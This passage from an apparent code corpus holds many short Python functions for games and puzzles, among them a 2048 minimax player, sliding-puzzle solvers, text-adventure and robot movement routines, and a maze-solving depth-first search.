= Max/1024\n return Max*left*v\n\n def mono(state):\n mon = 0\n# for i in range(4):\n# row = 0\n# for j in range(3):\n# if state.map[i][j] > state.map[i][j+1]:\n# row+=1\n# if row == 4:\n# mon += 1\n# for i in range(4):\n# column = 0\n# for j in range(3):\n# if state.map[j][i] > state.map[j+1][i]:\n# column +=1\n# if column == 4:\n# mon +=1\n#\n#\n# return mon/8\n for i in range(4):\n if all(earlier >= later for earlier, later in zip(grid.map[i], grid.map[i][1:])):\n mon+=1\n\n return mon/8\n\n def monotonic(state):\n cellvals = {}\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n for i in Path1:\n cellvals[i] = state.getCellValue(i)\n mon = 0\n for i in range(4):\n if cellvals.get((i,0)) >= cellvals.get((i,1)):\n if cellvals.get((i,1)) >= cellvals.get((i,2)):\n if cellvals.get((i,2)) >= cellvals.get((i,3)):\n mon +=1\n for j in range(4):\n if cellvals.get((0,j)) >= cellvals.get((1,j)):\n if cellvals.get((1,j)) >= cellvals.get((2,j)):\n if cellvals.get((2,j)) >= cellvals.get((3,j)):\n mon+=1\n return mon/8\n\n\n\n def htest2(state):\n score1 = 0\n score2 = 0\n r = 0.5\n\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n Path2 = [(3,0),(2,0),(1,0),(0,0),(0,1),(1,1),(2,1),(3,1),\n (3,2),(2,2),(1,2),(0,2),(0,3),(1,3),(2,3),(3,3)]\n valDict = {}\n for n in range(16):\n valDict[Path1[n]] = state.getCellValue(Path1[n])\n for n in range(16):\n if n%3 == 0:\n self.emergency()\n cell1 = valDict.get(Path1[n])\n cell2 = valDict.get(Path2[n])\n score1 += (cell1) * (r**n)\n score2 += (cell2) * (r**n)\n return max(score1,score2)\n\n\n def Maximize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n maxChild , maxUtility = None,-999999999\n state = stateTup[0]\n Map = self.dict.get(str(state.map))\n if Map == None:\n children = []\n for M in range(4):\n g = state.clone()\n if g.move(M):\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Minimize(childTup,A,B)[1]\n if utility > maxUtility:\n maxChild , maxUtility = child , utility\n if maxUtility >= B:\n# global prune\n# prune +=1\n break\n if maxUtility > A:\n A = maxUtility\n\n return (maxChild,maxUtility)\n\n\n def Minimize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n minChild , minUtility = None,999999999\n state = stateTup[0]\n Map= self.dict.get(str(state.map))\n if Map == None:\n cells= state.getAvailableCells()\n children = []\n tiles = [2,4]\n for i in cells:\n for j in tiles:\n g = state.clone()\n g.insertTile(i,j)\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Maximize(childTup,A,B)[1]\n if utility < minUtility:\n minChild , minUtility = child , utility\n if minUtility <= A:\n# global prune\n# prune +=1\n break\n if minUtility < B:\n B = minUtility\n\n return (minChild,minUtility)\n\n\n\n def decision(grid):\n \"\"\"\n Decision function which returns the move which led to the state\n \"\"\"\n child = Maximize((grid,0),-999999999,999999999)[0]\n Child = 
child.map\n g = grid.clone()\n for M in range(4):\n if g.move(M):\n if g.map == Child:\n # global prune\n # global pruneLog\n # pruneLog.append(prune)\n # print(prune)\n # print(sum(pruneLog)/len(pruneLog))\n return M\n g = grid.clone()\n\n self.dict = {}\n self.h = {}\n self.prevTime = time.clock()\n self.depthLimit = 1\n self.mL = []\n self.over = False\n while self.over == False:\n self.depthLimit +=1\n try :\n self.mL.append(decision(grid))\n\n except KeyError:\n# print(self.depthLimit)\n return self.mL[-1]\n except IndexError:\n return random.randint(0,3)\n self.Alarm(time.clock())\n return self.mL[-1]", "def solve_interior_tile(self, target_row, target_col):\r\n whole_move = ''\r\n # replace with your code\r\n if self._grid[target_row][target_col] != 0:\r\n # print \"DEBUG CASE WHEN ZERO IN JOPA\"\r\n \r\n # print self\r\n # print 'Solwing tile', self._grid[target_row][target_col]\r\n \r\n # print 'Searchind indexes of ZERO'\r\n for row in self._grid:\r\n for col in row:\r\n if col == 0:\r\n zero_row, zero_col = self._grid.index(row), row.index(col)\r\n break\r\n # print 'ZERO indexes=', (zero_row, zero_col)\r\n #####Moving zero to correct place\r\n #path_down = (target_row - zero_row) * 'd'\r\n #path_left = (zero_col - target_col) * 'l'\r\n if target_col - zero_col > 0:\r\n #path_right = (target_col - zero_col) * 'r'\r\n path_of_zero = (zero_col - target_col) * 'l' + (target_row - zero_row) * 'd' + (target_col - zero_col) * 'r'\r\n else:\r\n path_of_zero = (zero_col - target_col) * 'l' + (target_row - zero_row) * 'd'\r\n zero_col -= len(filter(lambda x: x=='l', path_of_zero))\r\n zero_col += len(filter(lambda x: x=='r', path_of_zero))\r\n zero_row += len(filter(lambda x: x=='d', path_of_zero))\r\n self.update_puzzle(path_of_zero)\r\n # print 'Grid after moving ZERO to target spot'\r\n # print self\r\n whole_move += path_of_zero\r\n assert self.lower_row_invariant(target_row, target_col), \"Invarian is False\"\r\n \r\n #current_position = self.current_position(target_row, target_col)\r\n #current_row, current_col = self.current_position(target_row, target_col)\r\n # print 'Target tile position=',current_position\r\n # print 'Target tile value=', self._grid[current_position[0]][current_position[1]]\r\n # print '0 position=', (target_row, target_col)\r\n \r\n ######Moving zero tile to the target tile\r\n path_up = (target_row - self.current_position(target_row, target_col)[0]) * 'u'\r\n zero_row = target_row - len(path_up)\r\n if target_col < self.current_position(target_row, target_col)[1]: # Right move\r\n path_side = (self.current_position(target_row, target_col)[1] - target_col) * 'r'\r\n zero_col = target_col + len(path_side)\r\n else: # Left move\r\n path_side = (target_col - self.current_position(target_row, target_col)[1]) * 'l'\r\n zero_col = target_col - len(path_side)\r\n \r\n #path_for_zero = path_up + path_side\r\n # print '------------------------------------------'\r\n # print 'Move to ZERO =', path_for_zero\r\n \r\n self.update_puzzle(path_up + path_side)\r\n \r\n # print 'Grid after move:'\r\n # print self\r\n # current_position = self.current_position(target_row, target_col) \r\n # current_row, current_col = current_position\r\n # print 'Updated Target tile position=',current_position\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (target_row, target_col)\r\n # print '-----------------------------------------'\r\n \r\n\r\n ###### New moves after moving ZERO tile into target tile\r\n # counter = 0\r\n whole_move += path_up + 
path_side\r\n while self.current_position(target_row, target_col) != \\\r\n (target_row, target_col) or zero_col != target_col - 1:\r\n # tt_in_home = self.current_position(target_row, target_col) == \\\r\n # (target_row, target_col)\r\n\r\n cyclic_moves = ''\r\n # counter += 1\r\n #current_position = self.current_position(target_row, target_col) \r\n #current_col = self.current_position(target_row, target_col)[1]\r\n # print 'Zero coloumn', zero_col, '== Target coloumn', target_col\r\n # print zero_col == target_col \r\n \r\n #### Case 1 if ZERO located in ther right of\r\n #### target tile (after it)\r\n if zero_col > self.current_position(target_row, target_col)[1]:\r\n # print ' Look in the up puzzle, zero on the right side'\r\n # if self.current_position(target_row, target_col)[1] != target_col:\r\n # # print 'not under target place'\r\n # cyclic_moves = 'dllur'\r\n # zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n if self.current_position(target_row, target_col)[1] == target_col and self._grid[zero_row+1][zero_col] < \\\r\n self._grid[self.current_position(target_row, target_col)[0]][self.current_position(target_row, target_col)[1]]:\r\n # print 'Tile tat is under ZERO is',self._grid[zero_row+1][zero_col] \r\n # print 'TT under target place'\r\n cyclic_moves = 'dlu'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n #zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n # elif self._grid[zero_row+1][zero_col] > \\\r\n # self._grid[self.current_position(target_row, target_col)[0]][self.current_position(target_row, target_col)[1]]:\r\n # # print 'Tile under zero is illegal to move and we use upper cycle move '\r\n \r\n # cyclic_moves = 'ul'\r\n # zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n\r\n #### Case 2 if ZERO located under the target tile, and both\r\n #### of them located under the target position of the target tile\r\n elif zero_col == self.current_position(target_row, target_col)[1] and zero_col == target_col:\r\n # print 'Both under the target place'\r\n # print 'TT in home=', tt_in_home\r\n if self.current_position(target_row, target_col) == \\\r\n (target_row, target_col):\r\n cyclic_moves = 'ld'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n #zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n \r\n else:\r\n cyclic_moves = 'lddru'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n \r\n #### Case 3 if ZERO located in the left side of the target tile\r\n ### like in the owel-test case\r\n elif zero_col < self.current_position(target_row, target_col)[1]:\r\n # print 'ZERO tile located in the left side'\r\n if self.current_position(target_row, target_col)[1] != target_col:\r\n # print 'not under the target place'\r\n cyclic_moves = 'drrul'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n elif self.current_position(target_row, target_col)[1] == target_col:\r\n # print 'Target tile under target place'\r\n cyclic_moves = 'dru'\r\n #zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n\r\n\r\n # print 'Puzzle after Maded move:', cyclic_moves\r\n self.update_puzzle(cyclic_moves)\r\n # print 'Zero at home=', 'Zero col', zero_col, '== Target col - 1 is', target_col - 1\r\n # print 
self\r\n # print 'Loot counter =',counter\r\n whole_move += cyclic_moves\r\n # if counter > 12:\r\n # break\r\n # print 'Tile is solved with move '+ whole_move\r\n assert self.lower_row_invariant(target_row, target_col-1), \"Invarian is False\"\r\n return whole_move", "def move_robot(room, direction):\r\n\r\n robot_row, robot_col = robot_location(room)\r\n\r\n intended_row = robot_row\r\n intended_col = robot_col\r\n\r\n if direction == \"right\":\r\n intended_col = robot_col + 1\r\n elif direction == \"left\":\r\n intended_col = robot_col - 1\r\n elif direction == \"up\":\r\n intended_row = robot_row - 1\r\n elif direction == \"down\":\r\n intended_row = robot_row + 1\r\n\r\n if room[intended_row][intended_col] != \"obstacle\":\r\n room[intended_row][intended_col] = \"robot\"\r\n room[robot_row][robot_col] = \"empty\"\r\n\r\n return room", "def solve_puzzle(self):\r\n # initialize some values and start tile at bottom right corner\r\n col = self.get_width() - 1\r\n row = self.get_height() - 1\r\n move = \"\"\r\n curr_row, curr_col = self.current_position(0, 0)\r\n move_to_target = abs(curr_col - col) * \"r\" + abs(curr_row - row) * \"d\"\r\n self.update_puzzle(move_to_target)\r\n move += move_to_target\r\n\r\n # apply solver methods\r\n for dummy_i in range(row, 1, -1):\r\n for dummy_j in range(col, 0, -1):\r\n move += self.solve_interior_tile(dummy_i, dummy_j)\r\n move += self.solve_col0_tile(dummy_i)\r\n \r\n for dummy_j in range(col, 1, -1):\r\n move += self.solve_row1_tile(dummy_j)\r\n move += self.solve_row0_tile(dummy_j)\r\n \r\n move += self.solve_2x2()\r\n return move", "def move_tile(self, target_row, target_col, val):\n # a little bit twisted here for the use of both solve_interior_tile and solve_col0_tile\n solved_row, solved_col = self.current_position(0, val)\n movements = \"\"\n if solved_row == target_row and solved_col == target_col:\n return \"\"\n if solved_row == target_row:\n if target_col > solved_col:\n movements = \"l\" * (target_col - solved_col) + \"urrdl\" * (\n target_col - solved_col - 1)\n else:\n movements = \"r\" * (solved_col - target_col) + \"ulldr\" * (\n solved_col - target_col - 1) + \"ulld\"\n elif solved_col == target_col:\n movements = \"u\" * (target_row - solved_row) + \"lddru\" * (\n target_row - solved_row - 1) + \"ld\"\n elif solved_col < target_col:\n if solved_col == 0:\n movements = \"l\" * (target_col - solved_col) + \"u\" * (\n target_row - solved_row) + \"rddlu\" * (\n target_row - solved_row - 1) + \"rdl\" + \"urrdl\" * (\n target_col - solved_col - 1)\n else:\n movements = \"l\" * (target_col - solved_col) + \"u\" * (\n target_row - solved_row) + \"lddru\" * (\n target_row - solved_row - 1) + \"rdl\" + \"urrdl\" * (\n target_col - solved_col - 1)\n elif solved_col > target_col:\n if solved_row == 0:\n movements = \"u\" * (target_row - solved_row) + \"r\" * (\n solved_col - target_col) + \"dllur\" * (\n solved_col - target_col - 1) + \"dlu\" + \"lddru\" * (\n target_row - solved_row - 1) + \"ld\"\n else:\n movements = \"u\" * (target_row - solved_row) + \"r\" * (\n solved_col - target_col) + \"ulldr\" * (\n solved_col - target_col - 1) + \"ullddru\" + \"lddru\" * (\n target_row - solved_row - 1) + \"ld\"\n return movements", "def execute_go(direction):\r\n global current_room\r\n if is_valid_exit(current_room[\"exits\"], direction):\r\n current_room = move(current_room[\"exits\"], direction)\r\n print_room(current_room)\r\n global valid_move\r\n valid_move = True\r\n else:\r\n wrap_print(\"You cannot go there\")", "def 
try_move_player(self):\n player = self.player\n if player.direction == 'U':\n next_position = (player.position[0], player.position[1] - 1)\n elif player.direction == 'D':\n next_position = (player.position[0], player.position[1] + 1)\n elif player.direction == 'L':\n next_position = (player.position[0] - 1, player.position[1])\n elif player.direction == 'R':\n next_position = (player.position[0] + 1, player.position[1])\n\n if self.__is_valid_position(next_position):\n self.player.position = next_position\n else:\n self.game_over = True", "def solve_puzzle(self):\n # move zero tile to the lower right corner\n row, col = self.current_position(0, 0)\n movements = \"d\" * (self.get_height() - 1 - row) + \"r\" * (\n self.get_width() - 1 - col)\n self.update_puzzle(movements)\n # solve rowid from 2 by row\n for row in range(self.get_height() - 1, 1, -1):\n for col in range(self.get_width() - 1, -1, -1):\n assert self.lower_row_invariant(row, col)\n if col == 0:\n movements += self.solve_col0_tile(row)\n assert self.lower_row_invariant(row - 1,\n self.get_width() - 1)\n else:\n movements += self.solve_interior_tile(row, col)\n assert self.lower_row_invariant(row, col - 1)\n # solve the uppermost two rows by column\n for col in range(self.get_width() - 1, 1, -1):\n for row in range(1, -1, -1):\n if row == 0:\n assert self.row0_invariant(col)\n movements += self.solve_row0_tile(col)\n assert self.row1_invariant(col - 1)\n else:\n assert self.row1_invariant(col)\n movements += self.solve_row1_tile(col)\n assert self.row0_invariant(col)\n movements += self.solve_2x2()\n return movements", "def Recharge_Method1(r, c): \n robot = NIL\n if state.loc[r] != state.pos[c] and state.pos[c] != r:\n if state.pos[c] in rv.LOCATIONS:\n alg.do_task('moveTo', r, state.pos[c])\n else:\n robot = state.pos[c]\n alg.do_command(put, robot, c)\n alg.do_task('moveTo', r, state.pos[c])\n alg.do_command(charge, r, c)\n if robot != NIL:\n alg.do_command(take, robot, c)", "def update(self):\n # Move left/right=====\n self.rect.x += self.change_x\n self.rect.y += self.change_y\n visited[int(self.rect.x/32)][int(self.rect.y/32)].append(self.id)\n\n self.path.append((int(self.rect.x/32), int(self.rect.y/32)))\n\n # if(self.rect.x == goal_x) & (self.rect.y == goal_y):\n # pygame.quit()\n # sys.exit(0)\n\n self.change_x = 0\n self.change_y = 0", "def makeMove(self, movable_statement):\n ### Student code goes here\n tile = movable_statement.terms[0].term.element\n initialX = movable_statement.terms[1].term.element\n initialY = movable_statement.terms[2].term.element\n goalX = movable_statement.terms[3].term.element\n goalY = movable_statement.terms[4].term.element\n r1 = parse_input(\"fact: (on \" + tile + \" \" + initialX + \" \" + initialY + \")\")\n self.kb.kb_retract(r1)\n r2 = parse_input(\"fact: (on empty \" + goalX + \" \" + goalY + \")\")\n self.kb.kb_retract(r2)\n stat1 = parse_input(\"fact: (on \" + tile + \" \" + goalX + \" \" + goalY + \")\")\n self.kb.kb_assert(stat1)\n stat2 = parse_input(\"fact: (on empty \" + initialX + \" \" + initialY + \")\")\n self.kb.kb_assert(stat2)\n\n\n #for facts in self.kb.facts:\n # print(facts.statement)\n\n #print(\"\\n\\n\")\n ##Need to handle adjacentTo\n '''ask = parse_input(\"fact: (adjacentTo empty ?tile)\")\n answer = self.kb.kb_ask(ask)\n empty_adj = []\n if answer:\n for ans in answer.list_of_bindings:\n adjTile = ans[0].bindings[0].constant.element\n if adjTile != tile:\n rt = parse_input(\"fact: (adjacentTo empty \" + adjTile + \")\")\n self.kb.kb_retract(rt)\n 
#print(\"RMOVINGGGG\")\n #print(rt)\n rt1 = parse_input(\"fact: (adjacentTo \" + adjTile + \" empty)\")\n self.kb.kb_retract(rt1)\n empty_adj.append(adjTile) #All of empty's adjacent tiles'''\n\n #for facts in self.kb.facts:\n # print(facts.statement)\n\n #print(\"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\")\n '''ask1 = parse_input(\"fact: (adjacentTo \" + tile + \" ?tile)\")\n answer1 = self.kb.kb_ask(ask1)\n if answer1:\n for ans in answer1.list_of_bindings:\n adjTile = ans[0].bindings[0].constant.element\n if adjTile != \"empty\":\n stat = parse_input(\"fact: (adjacentTo empty \" + adjTile + \")\")\n self.kb.kb_assert(stat)\n radj1 = parse_input(\"fact: (adjacentTo \" + tile + \" \" + adjTile + \")\")\n self.kb.kb_retract(radj1)\n radj2 = parse_input(\"fact: (adjacentTo \" + adjTile + \" \" + tile + \")\")\n self.kb.kb_retract(radj2)\n for tiles in empty_adj:\n stat = parse_input(\"fact: (adjacentTo \" + tile + \" \" + tiles + \")\")\n self.kb.kb_assert(stat)'''", "def move(self, direction):\n newx = self.x\n newy = self.y\n newy += random.randint(-1, 1)\n newx += random.randint(-1, 1)\n if self.tmap.contents[newy][newx] != '#':\n self.x = newx\n self.y = newy", "def move(self, direction):\r\n direc = list(OFFSETS[direction])\r\n line = []\r\n dummy_board = self.board[:]\r\n if direction == 3:\r\n for i in range(self.height):\r\n self.board[i] = merge(self.board[i])\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n elif direction == 4:\r\n for i in range(self.height):\r\n line = self.board[i][::-1]\r\n self.board[i] = merge(line)\r\n self.board[i] = self.board[i][::-1]\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n \r\n elif direction == 1 or 2:\r\n dummy_board = str(self.board[:])\r\n if direction == 1:\r\n tile = [0,0]\r\n elif direction == 2:\r\n tile = [self.height - 1, 0]\r\n for i in range(self.width):\r\n tile2 = tile[:]\r\n while len(line) < self.height:\r\n line.append(self.get_tile(*tile2))\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n line = merge(line)\r\n tile2 = tile[:]\r\n for i in range(self.height):\r\n self.set_tile(*(tile2+[line[0]]))\r\n line.remove(line[0])\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n tile = [x+y for x,y in zip(tile, [0,1])]\r\n if dummy_board != self.__str__():\r\n self.new_tile()\r\n return self.board", "def move_pawn(pos, game):\n #Convert coordinates to row and column\n row = int(pos[1]//(SQUARESIZE+FENCEWIDTH))\n col = int(pos[0]//(SQUARESIZE+FENCEWIDTH))\n #Make move\n game.move_pawn(game.get_player_turn(), (col,row))", "def move(self):\n\n x, y = self.position\n\n if self.in_spawn_area:\n if 0 <= x < MAP_SIZE and 0 <= y < MAP_SIZE:\n self.in_spawn_area = False\n\n preferred_direction = self.get_preferred_direction()\n\n if preferred_direction == (0, 0):\n return\n\n new_tiles = self.calculate_tiles_ahead(preferred_direction)\n\n if self.can_advance(new_tiles, preferred_direction):\n self.position = self.position[0] + preferred_direction[0] * 2, self.position[1] + preferred_direction[1] * 2\n self.update_cache_after_move(preferred_direction, new_tiles)\n self.previous_direction = preferred_direction[:]", "def move(self):\n \"\"\" Responsible for transformations \"\"\"\n pos, com, success = self.perception \n if self.destination is None:\n return array([0,0])\n\n if not self.awake:\n return array([0,0])\n\n\n if self.phase == 4 and self.proper_formation is not None:\n no_go = []\n for i in 
range(0,len(self.proper_formation)):\n if i != self.order and self.proper_formation[i][0] == self.proper_formation[self.order][0]:\n no_go.append(self.transform(self.proper_formation[i][1] - self.position))\n pos = merge_array_lists(pos, no_go)\n\n if self.phase == 2:\n point = self.destination.copy() - self.position\n elif self.phase > 2:\n point = self.transform(self.destination.copy() - self.position)\n else:\n point = self.destination.copy()\n\n if not array_equal(point, array([0,0])):\n reachable, path = findpathtoclosest(array([0,0]), point, pos)\n \n if len(path) == 0:\n move = array([0,0]) \n else:\n move = path[0]\n if not reachable and not array_equal(move,array([0,0])):\n if self.phase == 2:\n self.closest_i_could_get = path[-1] + self.position\n elif self.phase > 2:\n self.closest_i_could_get = self.transform2(path[-1]) + self.position\n else:\n self.closest_i_could_get = path[-1]\n elif not reachable:\n if self.phase > 1:\n self.closest_i_could_get = self.position\n else:\n self.closest_i_could_get = array([0,0])\n else:\n self.closest_i_could_get = None\n\n if reachable and self.phase == 4 and array_equal(move,array([0,0])):\n move = self.randomStep()\n self.closest_i_could_get = None\n\n else:\n move = array([0,0])\n self.closest_i_could_get = None\n\n return move", "def move(puzzle: str, direction: str):\r\n position_index = puzzle.index(EMPTY)\r\n position = position_index + 1\r\n grid_width = get_grid_width(puzzle)\r\n\r\n # What direction to moved the tile if it's a valid move\r\n if direction == UP:\r\n if (position) > grid_width:\r\n return swap_position(puzzle, position_index, position_index - grid_width)\r\n\r\n elif direction == DOWN:\r\n if (len(puzzle) - position) >= grid_width:\r\n return swap_position(puzzle, position_index, position_index + grid_width)\r\n\r\n elif direction == LEFT:\r\n if (position - 1) % grid_width != 0:\r\n return swap_position(puzzle, position_index, position_index - 1)\r\n\r\n elif direction == RIGHT:\r\n if position % grid_width != 0:\r\n return swap_position(puzzle, position_index, position_index + 1)\r\n\r\n return None", "def move_to_location(cardinal_point):\r\n\r\n\ttry:\r\n\r\n\t\told_room = config[\"GAMEDATA\"][\"CURRENTZONE\"]\r\n\t\tnew_room = world.WORLD_ROOMS[old_room][cardinal_point]\r\n\t\t\r\n\t\tif new_room == None:\r\n\t\t\ttprint(\"You cannot go there.\")\r\n\t\t\treturn\r\n\r\n\t\t\r\n\t\tnew_room_name = getstring(world.WORLD_ROOMS[new_room][\"NAME\"])\r\n\t\t\r\n\t\tdebug(\"new_room = \" + str(new_room))\r\n\t\tdebug(\"new_room_name = \" + str(new_room_name))\r\n\r\n\t\tif world.WORLD_ROOMS[new_room][\"NEEDITEM\"] != None: # If an item is required to go there...\r\n\t\t\tcurrent_inventory = config[\"GAMEDATA\"][\"INVENTORY\"]\r\n\t\t\tneeded_item_id = world.WORLD_ITEMS[world.WORLD_ROOMS[new_room][\"NEEDITEM\"]][\"ID\"]\r\n\t\t\tneeded_item_name = world.WORLD_ITEMS[world.WORLD_ROOMS[new_room][\"NEEDITEM\"]][\"NAME\"]\r\n\t\t\t\r\n\t\t\tif current_inventory == None:\r\n\t\t\t\ttprint(\"You do not have the required item in your inventory,\")\r\n\t\t\t\ttprint(\"You need to have '\" + needed_item_name + \"'\")\r\n\t\t\t\treturn\r\n\t\t\t\t\r\n\t\t\telse: # Inventory isn't blank\r\n\t\t\t\tfor item_id in current_inventory:\r\n\t\t\t\t\tif item_id == needed_item_id: # If the player have the needed item in his inventory...\r\n\t\t\t\t\t\ttprint(\"You entered by using \" + needed_item_name)\r\n\t\t\t\t\t\ttprint(\"you are now at : \" + new_room_name)\r\n\t\t\t\t\t\tconfig[\"GAMEDATA\"][\"CURRENTZONE\"] = 
new_room\r\n\t\t\t\t\t\treturn # Exits the function\r\n\t\t\t\t\t\r\n\t\t\t\t# If we arrive here, this means that the player doesn't have the needed item.\r\n\t\t\t\ttprint(\"You do not have the required item in your inventory,\")\r\n\t\t\t\ttprint(\"You need to have '\" + needed_item_name + \"'\")\r\n\t\t\t\treturn\r\n\t\t\t\r\n\t\telse: # The room doesn't requires an item...\r\n\t\t\tconfig[\"GAMEDATA\"][\"CURRENTZONE\"] = new_room\r\n\t\t\ttprint(\"You are now at : \" + new_room_name)\r\n\t\t\treturn\r\n\t\r\n\texcept Exception as error: # If we arrive here, this means that there is a bug in there, oops.\r\n\t\tprint(\"ERROR! in function move_to_location() try block raised an exception !\")\r\n\t\tprint(str(error))\r\n\t\ttraceback.print_exc()\r\n\t\treturn", "def move(self):\r\n if self.d == 'NORTH' and (self.y + 1) <= table_max_y:\r\n self.y += 1\r\n elif self.d == 'EAST' and (self.x + 1) <= table_max_x:\r\n self.x += 1\r\n elif self.d == 'SOUTH' and (self.y - 1) >= 0:\r\n self.y -= 1\r\n elif self.d == 'WEST' and (self.x - 1) >= 0:\r\n self.x -= 1\r\n else:\r\n print(\"Edge of Table Reached!\")", "def solve_puzzle(self):\n cur0_row, cur0_col = self.current_position(0, 0)\n move_str = 'd' * (self._height - cur0_row - 1) + 'r' * (self._width - cur0_col - 1)\n self.update_puzzle(move_str)\n for row in range(self._height-1, 1, -1):\n for col in range(self._width-1, -1, -1):\n assert self.lower_row_invariant(row, col)\n if col != 0:\n move_str += self.solve_interior_tile(row, col)\n else:\n move_str += self.solve_col0_tile(row)\n for col in range(self._width-1, 1, -1):\n assert self.row1_invariant(col)\n move_str += self.solve_row1_tile(col)\n assert self.row0_invariant(col)\n move_str += self.solve_row0_tile(col)\n move_str += self.solve_2x2()\n return move_str", "def dfs(game, game_coords):\n # *** the main stack to record steps ***\n stack_moves = [[game.player.row, game.player.col]]\n\n # record path and illegal moves\n route = []\n declined_moves = []\n\n # met fire and no water on hand\n met_fire = False\n\n # keep looping until reaching end point\n while stack_moves[-1] != game_coords['Y'][0]:\n # main stack popped in last turn\n go_back = False\n\n # struggled more than three turns\n if len(route) > 3 and route[-1] == 3 and route[-2] == 3 and route[-3] == 3:\n return 0, 0, 0\n\n player_coords = [game.player.row, game.player.col]\n\n # try the first possible move: left, down, right, up, teleport, go back(pop)\n if left(player_coords) not in stack_moves and left(player_coords) not in declined_moves:\n will_move = left(player_coords)\n action = 1\n\n elif down(player_coords) not in stack_moves and down(player_coords) not in declined_moves:\n will_move = down(player_coords)\n action = 2\n\n elif right(player_coords) not in stack_moves and right(player_coords) not in declined_moves:\n will_move = right(player_coords)\n action = -1\n\n elif up(player_coords) not in stack_moves and up(player_coords) not in declined_moves:\n will_move = up(player_coords)\n action = -2\n\n elif search_coords(game_coords, stack_moves[-1]) in ['1', '2', '3', '4', '5', '6', '7', '8', '9']:\n # teleport from current location\n action = 3\n will_move = stack_moves[-1]\n\n else:\n # pop the last element in main stack\n declined_moves.append(stack_moves.pop())\n\n # back upon start point, loss!\n if not stack_moves:\n return 0, 0, 0\n\n # go back\n will_move = stack_moves[-1]\n action = -route[-1]\n go_back = True\n\n # check if move is legal\n item = search_coords(game_coords, will_move)\n\n if item == '*' or 
item == -1:\n declined_moves.append(will_move)\n continue\n elif item == 'W':\n game.player.num_water_buckets += 1\n if met_fire:\n # can put out fire now, therefore, seeking path using a fresh mind :)\n stack_moves = []\n declined_moves = []\n met_fire = False\n\n for i in range(len(game_coords['W'])):\n # water picked up, set current display from 'W' to ' ' in game_coords\n if game_coords['W'][i] == will_move:\n game_coords['W'].pop(i)\n game_coords[' '].append(will_move)\n break\n elif item == 'F':\n if game.player.num_water_buckets < 1:\n # cannot put out fire, refuse this move :(\n declined_moves.append(will_move)\n met_fire = True\n continue\n game.player.num_water_buckets -= 1\n elif item in ['1', '2', '3', '4', '5', '6', '7', '8', '9']:\n for coords in game_coords[item]:\n if coords != will_move:\n will_move = coords\n break\n\n # *** append to main stack ***\n if not go_back:\n stack_moves.append(will_move)\n\n # *** move the player ***\n game.player.row = will_move[0]\n game.player.col = will_move[1]\n\n route.append(action)\n\n action_map = {1: 'a', 2: 's', -1: 'd', -2: 'w', 3: 'e'}\n\n # translate action to string of cmd\n trace = ''\n for action in route:\n trace += action_map[action] + ', '\n\n return 1, len(route), trace", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def locateRobot(self):\n logging.info(\"Display Carte : {}\".format(self.name))\n for r, row in enumerate(self.map):\n #print(row)\n for c, cell in enumerate(row):\n if (cell == \"X\"):\n logging.info(\"r={} / c={}\".format(r, c))\n self.robot.posX = c\n self.robot.posY = r", "def move(self, direction: str) -> int:\n (i, j), _ = self.position.popitem(last=True) # current position\n self.position[(i, j)] = 0 # add back \n if direction == \"U\": i -= 1\n elif direction == \"L\": j -= 1\n elif direction == \"R\": j += 1\n else: i += 1\n if self.food and self.food[0] == [i, j]: self.food.popleft()\n else: self.position.popitem(last=False)\n if not (0 <= i < self.height and 0 <= j < self.width) or (i, j) in self.position: return -1 # game over \n self.position[(i, j)] = 0\n return len(self.position)-1", "def _move(self, direction, difference):\n future_tile_number = self.get_number() + difference\n if future_tile_number in range(1, Tile.total_tiles + 1):\n future_tile = Tile.get_tile(future_tile_number)\n if future_tile.walkable:\n self.set_target(future_tile)\n self.rotate(direction)", "def update_puzzle(self, move_string):\r\n zero_row, zero_col = self.current_position(0, 0)\r\n for direction in move_string:\r\n if direction == \"l\":\r\n assert zero_col > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\r\n self._grid[zero_row][zero_col - 1] = 0\r\n zero_col 